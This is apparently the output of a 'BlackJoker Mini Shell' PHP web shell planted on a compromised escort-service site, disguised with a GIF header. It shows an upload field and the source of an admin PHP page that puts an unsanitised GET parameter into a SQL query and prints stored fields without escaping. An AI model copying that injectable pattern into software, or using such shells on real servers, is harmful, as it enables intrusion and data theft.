GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/admin/
Upload File :
Current File : /home/serb/public_html/admin/escorthelp_details.php

<? 
  include("../lib/globals.php");
  include("../lib/common.php");
  include("../lib/functions.php");
  $id=$_GET["id"];
  $sql="select * from escort_help where id='$id'";
  $rs=execute_query($sql);
  $row=mysql_fetch_array($rs);
  function format_comment($str)
  {
    if($str=="")
	{
	  return "None";
	}
	else
	{
	  return $str;
	}
  }
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Escortservice | Admin ::</title>
</head>
<link rel="stylesheet" type="text/css" href="../style.css" />
<body>
<br>
<div id="homebottom3">
<table width="600" border="0" align="center" class="Table">
  <tr>
    <td width="3%">&nbsp;</td>
    <td width="21%">&nbsp;</td>
    <td width="75%">&nbsp;</td>
    <td width="1%">&nbsp;</td>
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td align="left" valign="top" class="gtext"><strong>Category Name:</strong></td>
    <td align="left" class="gtext">&nbsp;<?
												
	 print stripslashes($row['title']);?></td>
    <td>&nbsp;</td>
  </tr>
  <tr height="5">
                    
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td align="left" valign="top" class="gtext"><strong>Question: &nbsp </strong></td>
    <td align="left" class="gtext">&nbsp;<?
												
	 print stripslashes($row['question']);?></td>
    <td>&nbsp;</td>
  </tr>
  <tr height="5">
                    
  </tr>
  <tr>
    <td>&nbsp;</td>
    <td align="left" valign="top" class="gtext"><strong>Answare: &nbsp;</strong></td>
    <td align="left" class="gtext">&nbsp;<?
												
	 print stripslashes($row['answare']);?></td>
    <td>&nbsp;</td>
  </tr>
  
 
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="4" align="center" class="gtext"><a href="javascript:window.close()" class="footer-link">[ Close window ] </a></td>
    </tr>
  <tr>
    <td colspan="4" align="center" class="gtext">&nbsp;</td>
  </tr>
</table>
</div>
</body>
</html>

./BlackJoker Mini Shell 1.0